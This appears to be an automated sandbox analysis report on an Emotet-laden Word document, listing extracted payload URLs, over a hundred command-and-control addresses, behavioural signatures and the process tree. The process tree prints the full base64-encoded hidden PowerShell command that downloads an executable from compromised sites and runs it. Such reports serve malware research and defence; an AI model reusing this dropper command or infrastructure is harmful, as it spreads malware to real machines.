Analysis
-
max time kernel
27s -
resource
win10v191014 -
submitted
22-01-2020 15:07
General
Malware Config
Extracted
http://cxlit.com/wp-admin/SjM/
http://johncharlesdental.com.au/wp-content/6DVi/
http://www.kongtoubi.org/wp-includes/hiLAx/
http://maruka-dev.herokuapp.com/wp-includes/msuft/
http://ceylonsri.com/cgi-bin/5n6jdz/
Extracted
emotet
68.114.229.171:80
74.101.225.121:443
152.168.248.128:443
217.160.19.232:8080
176.9.43.37:8080
5.199.130.105:7080
37.187.72.193:8080
68.172.243.146:80
181.143.126.170:80
108.191.2.72:80
85.152.174.56:80
101.187.197.33:443
121.88.5.176:443
189.203.177.41:443
78.186.5.109:443
66.34.201.20:7080
209.141.54.221:8080
181.126.70.117:80
87.106.136.232:8080
181.13.24.82:80
58.171.42.66:8080
47.156.70.145:80
201.184.105.242:443
188.0.135.237:80
190.12.119.180:443
115.95.6.218:443
46.105.131.69:443
190.55.181.54:443
139.130.241.252:443
41.60.200.34:80
201.173.217.124:443
95.128.43.213:8080
78.142.114.69:80
37.157.194.134:443
200.71.200.4:443
160.16.215.66:8080
139.130.242.43:80
206.189.112.148:8080
70.169.53.234:80
61.37.31.243:80
91.73.197.90:80
167.71.10.37:8080
108.179.206.219:8080
88.249.120.205:80
50.116.86.205:8080
72.189.57.105:80
47.180.91.213:80
85.105.205.77:8080
190.143.39.231:80
223.197.185.60:80
91.205.215.66:443
120.150.246.241:80
104.131.44.150:8080
211.63.71.72:8080
149.202.153.252:8080
105.27.155.182:80
95.213.236.64:8080
104.131.11.150:8080
210.6.85.121:80
24.164.79.147:8080
92.222.216.44:8080
202.175.121.202:8090
221.165.123.72:80
118.185.7.132:80
74.130.83.133:80
110.36.217.66:8080
179.13.185.19:80
209.97.168.52:8080
62.138.26.28:8080
47.6.15.79:443
169.239.182.217:8080
5.196.74.210:8080
173.21.26.90:80
62.75.187.192:8080
183.102.238.69:465
178.153.176.124:80
105.247.123.133:8080
31.172.240.91:8080
103.86.49.11:8080
60.250.78.22:443
100.6.23.40:80
186.86.247.171:443
200.116.145.225:443
177.239.160.121:80
98.156.206.153:80
47.6.15.79:80
64.40.250.5:80
73.11.153.178:8080
101.187.237.217:80
190.117.126.169:80
98.30.113.161:80
45.33.49.124:443
76.104.80.47:80
103.97.95.218:80
72.186.137.156:80
64.66.6.71:8080
182.176.132.213:8090
24.94.237.248:80
24.196.49.98:80
78.189.180.107:80
87.81.51.125:80
190.220.19.82:443
70.175.171.251:80
159.65.25.128:8080
62.75.141.82:80
217.160.182.191:8080
190.146.205.227:8080
189.159.112.237:8080
90.69.145.210:8080
200.21.90.5:443
76.104.80.47:443
87.106.139.101:8080
37.139.21.175:8080
205.185.117.108:8080
115.65.111.148:443
60.231.217.199:8080
211.192.153.224:80
201.229.45.222:8080
190.114.244.182:443
87.230.19.21:8080
47.153.183.211:80
190.117.226.104:80
178.237.139.83:8080
85.67.10.190:80
180.92.239.110:8080
2.237.76.249:80
24.105.202.216:443
Signatures
-
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4976 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3336 wrote to memory of 3848 3336 Powershell.exe 80 PID 3848 wrote to memory of 4368 3848 580.exe 81 -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\580.exe => C:\Windows\SysWOW64\devicesblb.exe 580.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4976 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3336 4356 Powershell.exe 74 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3336 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3336 Powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 3848 580.exe 4368 580.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 4368 580.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\074ec6f9a2776114bc1d9e2da2250b73417843b3357ada6f17a5f4b606ab9a91.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
PID:4976
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABXAGcAeQBnAGIAawBsAGgAcABvAGkAZgA9ACcARQB1AGMAYwBnAHkAZgBmAGMAeQAnADsAJABEAGEAYgBkAG0AcQB1AG0AYQBkACAAPQAgACcANQA4ADAAJwA7ACQATwBxAGkAYwBlAHgAbQBiAHEAeABrAGcAYgA9ACcAVwBwAHMAdwBtAGIAbQBhAGoAJwA7ACQAWQBoAHgAeAB2AHIAaABtAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEQAYQBiAGQAbQBxAHUAbQBhAGQAKwAnAC4AZQB4AGUAJwA7ACQAQwBvAHEAZABhAHIAagBvAHcAcgBoAGwAZAA9ACcASgBuAHcAcgB3AGUAeQBhACcAOwAkAFIAawBnAGsAdwBrAG0AbwBtAHgAeAB3AD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAGUAVAAuAFcARQBCAGMAbABJAEUAbgB0ADsAJABTAGoAcgBxAGQAeABpAGIAcAB1AGsAPQAnAGgAdAB0AHAAOgAvAC8AYwB4AGwAaQB0AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBTAGoATQAvACoAaAB0AHQAcAA6AC8ALwBqAG8AaABuAGMAaABhAHIAbABlAHMAZABlAG4AdABhAGwALgBjAG8AbQAuAGEAdQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA2AEQAVgBpAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AawBvAG4AZwB0AG8AdQBiAGkALgBvAHIAZwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGgAaQBMAEEAeAAvACoAaAB0AHQAcAA6AC8ALwBtAGEAcgB1AGsAYQAtAGQAZQB2AC4AaABlAHIAbwBrAHUAYQBwAHAALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AcwB1AGYAdAAvACoAaAB0AHQAcAA6AC8ALwBjAGUAeQBsAG8AbgBzAHIAaQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADUAbgA2AGoAZAB6AC8AJwAuACIAcwBQAGwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABGAHMAZgB2AGMAcQB5AGYAaQB2AHkAPQAnAFgAdAB4AG4AZABvAHAAZABwAHAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMAcwBnAHoAcQB2AGkAZgBsAHUAIABpAG4AIAAkAFMAagByAHEAZAB4AGkAYgBwAHUAawApAHsAdAByAHkAewAkAFIAawBnAGsAdwBrAG0AbwBtAHgAeAB3AC4AIgBEAG8AYABXAG4ATABPAEEAYABEAGYAaQBMAGUAIgAoACQAUwBzAGcAegBxAHYAaQBmAGwAdQAsACAAJABZAGgAeAB4AHYAcgBoAG0AbAApADsAJABZAGQAcgBhAHMAZABvAGgAcQB1AHoAZQA9ACcAQQBpAGcAdgBsAGYAeQBiAHkAeQB6AHIAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABZAGgAeAB4AHYAcgBoAG0AbAApAC4AIgBsAGAAZQBuAEcAYABUAGgAIgAgAC0AZwBlACAAMwA1ADcAOAA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABgAEEAUgBUACIAKAAkAFkAaAB4AHgAdgByAGgAbQBsACkAOwAkAEoAcQBjAHYAZABlAG0AaABlAHEAcwBqAD0AJwBEAHQAcwB1AGsAbgBoAHgAdABlAGUAcwB4ACcAOwBiAHIAZQBhAGsAOwAkAEIAYQBqAGMAbgBnAGUAeABpAHAAbwBvAD0AJwBGAHMAdgB1AGUAdgBmAGcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBtAG0AdwB4AHIAawBoAGgAbwA9ACcASgBnAHEAcQB6AHYAawBlAHYAegBmACcA1⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3336 -
C:\Users\Admin\580.exe"C:\Users\Admin\580.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:3848 -
C:\Users\Admin\580.exe--f8a0020b3⤵
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:4368
-
-